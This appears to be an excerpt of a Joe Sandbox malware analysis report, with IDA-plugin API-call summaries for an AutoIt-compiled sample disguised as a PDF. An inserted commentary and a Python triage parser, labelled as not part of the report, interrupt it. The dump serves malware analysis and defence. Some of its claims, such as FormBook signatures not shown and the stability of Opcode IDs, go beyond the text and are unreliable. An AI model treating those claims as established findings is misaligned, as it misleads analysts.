                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                                                                                                                      • Instruction ID: ff0cba0e87fb21518449493418a2e056f609604e1d8d76e820356dcf828760de
                                                                                                                      • Opcode Fuzzy Hash: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                                                                                                                      • Instruction Fuzzy Hash: 1E318235A00209DFDB04EF64CC89BEE77B8FF84710F14802AE902D7291DBB99946C791
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A94F6
                                                                                                                      • GetDlgCtrlID.USER32 ref: 007A9501
                                                                                                                      • GetParent.USER32 ref: 007A951D
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9520
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007A9529
                                                                                                                      • GetParent.USER32(?), ref: 007A9545
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9548
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                                                                                                                      • Instruction ID: 08724a79b6b88ac44402238014b6a691cca4d34018d1f3295fbd10bb39c97543
                                                                                                                      • Opcode Fuzzy Hash: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                                                                                                                      • Instruction Fuzzy Hash: 7B21A370D00104FBCF059B64CC89DEEBB75EF8A300F104216F962972E2DB7D9929DA20
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A95DF
                                                                                                                      • GetDlgCtrlID.USER32 ref: 007A95EA
                                                                                                                      • GetParent.USER32 ref: 007A9606
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9609
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007A9612
                                                                                                                      • GetParent.USER32(?), ref: 007A962E
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9631
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                                                                                                                      • Instruction ID: b173e6d14b590081fd8d49b943c647ab68e84662442f0a82ab2a9c2d6789e735
                                                                                                                      • Opcode Fuzzy Hash: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                                                                                                                      • Instruction Fuzzy Hash: 4D21A474D01104BBDF05AB60CC89EFEBB75EF49300F104116F962972E2DB7D9529DA20
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 007A9651
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 007A9666
                                                                                                                      • _wcscmp.LIBCMT ref: 007A9678
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A96F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                                                                                                                      • Instruction ID: bf71c48d9247deb53078dd23ab69c56f3758d00ea6d6471590a6af07cb3bed9c
                                                                                                                      • Opcode Fuzzy Hash: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                                                                                                                      • Instruction Fuzzy Hash: 4A112977248307FAFA112621DC0BDE6779CDF46770F204226FB15E50D2FEAE69205958
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 007B419D
                                                                                                                      • __swprintf.LIBCMT ref: 007B41AA
                                                                                                                        • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B41D4
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 007B41E0
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 007B41ED
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 007B420D
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 007B421F
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 007B422E
                                                                                                                      • LockResource.KERNEL32(?), ref: 007B423A
                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B429B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1433390588-0
                                                                                                                      • Opcode ID: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                                                                                                                      • Instruction ID: 2ae77b4dbed4755789f0c56a71048ce745354da3ce1cb21ede51acd0314912be
                                                                                                                      • Opcode Fuzzy Hash: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                                                                                                                      • Instruction Fuzzy Hash: FE319271A0521AABDB119FA0DC48EFF7BBDFF08341F008529F906D6152E738DA519BA4
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007B1700
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B1714
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 007B171B
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B172A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 007B173C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B1755
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B1767
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17AC
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17C1
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17CC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: c4aa6931bb93f86b69b19a91b13b4f979040baf74de62703115b6ca33aad17be
                                                                                                                      • Instruction ID: c2adc0cda2b8e681891ef00b5bcab5e045784e0fe7fa844634e979a7f2f68c68
                                                                                                                      • Opcode Fuzzy Hash: c4aa6931bb93f86b69b19a91b13b4f979040baf74de62703115b6ca33aad17be
                                                                                                                      • Instruction Fuzzy Hash: 25319A75604204BBEB119F24DC98BEA3BBEEF15721F908069F801C72A0DF789E40CB60
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FC06
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0075FCA5
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0075FDFC
                                                                                                                      • DestroyWindow.USER32(?), ref: 00794A00
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00794A65
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794A92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                                                                                                                      • Instruction ID: 1482d2b7ab27142e979d61e7afd37bef1cb22b7e68837d1a223b61546660cdae
                                                                                                                      • Opcode Fuzzy Hash: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                                                                                                                      • Instruction Fuzzy Hash: 04A19E70701212CFCB29EF14D899EA9F764EF04701F1482ADE90AAB251DB78ED16CF94
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-1439926319
                                                                                                                      • Opcode ID: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                                                                                                                      • Instruction ID: 526f02aa8883b03e9f5b3ebd566efc704cafb0ce3aa34b1a6847b213bb67cccb
                                                                                                                      • Opcode Fuzzy Hash: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                                                                                                                      • Instruction Fuzzy Hash: B5919D71A00219EBDF64DFA5D848FAEBBB8EF45710F10815DFA15AB280D7789905CFA0
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,007AAA64), ref: 007AA9A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                                                                                                                      • Instruction ID: d208af2aa62b41fae6551e868608e3000be3184ee39fa27290e98e355b6a49de
                                                                                                                      • Opcode Fuzzy Hash: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                                                                                                                      • Instruction Fuzzy Hash: 3791B270A00606EBCF58DF70C485BEAFB74BF45340F108219D99AA7181DF387A59CB91
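The blocks above are the Joe Sandbox IDA plugin's per-function summaries of the main module mapped at 00750000. Read next to the report's "Binary is likely a compiled AutoIt script file" signature, most of them look like the AutoIt3 interpreter's own code rather than the FormBook payload: CLASS, CLASSNN, INSTANCE, NAME, REGEXPCLASS and TEXT are AutoIt's advanced control-identifier keys; "Incorrect Object type in FOR..IN loop" and "Null Object assignment in FOR..IN loop" are AutoIt runtime error messages; the list/details/smallicons/largeicons strings beside the SHELLDLL_DefView class check are consistent with AutoIt's ControlListView view switching; and the GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput sequence is consistent with the focus-attach trick AutoIt uses for WinActivate and ControlSend. Triage time is better spent on the functions behind the injection and anti-analysis signatures listed at the top of the report. The following Python script is an added example, not part of the report and not Joe Sandbox code: it parses function blocks in this layout into records, discards the "Download File" link residue, and tags each function so interpreter code can be separated from payload code. The marker strings, the tag names and the three-block excerpt it runs on are this example's assumptions; the excerpt's values are copied from the blocks above.

```python
"""Parse Joe Sandbox 'IDA Plugin' per-function blocks and tag each function.

Added example, not part of the Joe Sandbox report: the parser, the marker
list and the tag names are this editor's assumptions, chosen to match the
line shapes visible in the report (bullet lines, 'ref: <hex>' suffix,
'$'-separated API ID / String ID values).
"""
import re
from dataclasses import dataclass, field

# One API call line, with or without an argument list or subcall prefix, e.g.
#   • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A95DF
#   • GetDlgCtrlID.USER32 ref: 007A95EA
#   • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# Generic '• Key: value' line (API ID, String ID, Opcode ID, Source File, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# Strings that come from the AutoIt3 interpreter itself (control-ID keys and
# FOR..IN error messages), not from the payload a compiled script carries.
# Assumed marker list for this example; extend it as you confirm more.
AUTOIT_MARKERS = {
    "CLASSNN", "REGEXPCLASS",
    "Incorrect Object type in FOR..IN loop",
    "Null Object assignment in FOR..IN loop",
}


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)   # (name, module, args, ref, subcall caller)
    strings: list = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


def parse_report(text):
    """Split the dump into FunctionBlock records; each block starts at 'APIs'."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().replace("Download File", "").strip()  # drop link residue
        if not line:
            continue
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m and section == "APIs":
            args = m["args"].split(",") if m["args"] is not None else []
            current.apis.append((m["name"], m["module"], args, m["ref"], m["caller"]))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        key, value = f["key"], f["value"]
        if key == "String ID":
            current.strings = [s for s in value.split("$") if s]
        elif key == "API ID":
            current.api_id = value
        elif key == "Opcode ID":
            current.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
    return blocks


def classify(block):
    """Tag a block with the behaviours an analyst triages first (assumed tag names)."""
    tags = set()
    names = {name for name, *_ in block.apis}
    if AUTOIT_MARKERS & set(block.strings):
        tags.add("autoit_runtime")        # interpreter code, not payload
    if "AttachThreadInput" in names and "GetForegroundWindow" in names:
        tags.add("input_queue_attach")    # joins the foreground thread's input queue
    if "CreateIconFromResourceEx" in names:
        tags.add("icon_from_resource")
    if "EnumChildWindows" in names:
        tags.add("window_enumeration")
    return tags


def triage(text):
    """Return [(opcode_id[:12], sorted tags, api_count)] for every parsed block."""
    return [(b.opcode_id[:12], sorted(classify(b)), len(b.apis)) for b in parse_report(text)]


# Constructed excerpt in the report's layout (three functions, trimmed); the
# values are copied from the blocks above, not taken from a new analysis.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 007B1700
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B1714
• GetWindowThreadProcessId.USER32(00000000), ref: 007B171B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B172A
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• Opcode ID: c4aa6931bb93f86b69b19a91b13b4f979040baf74de62703115b6ca33aad17be
APIs
• EnumChildWindows.USER32(?,007AAA64), ref: 007AA9A2
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• Opcode ID: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
APIs
Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• Opcode ID: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
"""

if __name__ == "__main__":
    for opcode, tags, n in triage(SAMPLE):
        print(f"{opcode}  apis={n:<2} tags={','.join(tags) or '-'}")
```

Run it over the full "IDA Plugin" text of a report and the functions left without the autoit_runtime tag are the ones worth opening first; the Opcode ID prefix in each row is stable across samples built from the same AutoIt version, so it can also be used to suppress known interpreter functions in later reports.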
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
                                                                                                                        • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
                                                                                                                        • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
                                                                                                                        • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
                                                                                                                      • GetDC.USER32 ref: 0078CF82
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CF95
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0078CFA3
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0078CFB8
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0078CFC0
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078D04B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                                                                                                                      • Instruction ID: 1571bfc8dee5bedfa91f992124e5afb9d3ef87637551670518251c44f53cd814
                                                                                                                      • Opcode Fuzzy Hash: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                                                                                                                      • Instruction Fuzzy Hash: 8171E531400205DFCF21EF64CC85AFA3BB5FF49311F14826AEE555A2A6D7398C56DB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                        • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                                        • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007DC2E4
                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 007DC2EA
                                                                                                                      • ReleaseCapture.USER32 ref: 007DC2F0
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 007DC39A
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DC3AD
                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007DC48F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                      • Opcode ID: 03366b0333ff2e920971a0a542a00662b199f034b7014575806372275846961e
                                                                                                                      • Instruction ID: bc204e2f7c600eb746b2fcc0e283aa104ea09ca696208547b2ff7b5943c55a5e
                                                                                                                      • Opcode Fuzzy Hash: 03366b0333ff2e920971a0a542a00662b199f034b7014575806372275846961e
                                                                                                                      • Instruction Fuzzy Hash: DE517B70204205EFD700DF24C85ABAA7BF5FF88311F04852AF996872E1DB79A959CB52
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C903D
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C9071
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C91EB
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 007C9215
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
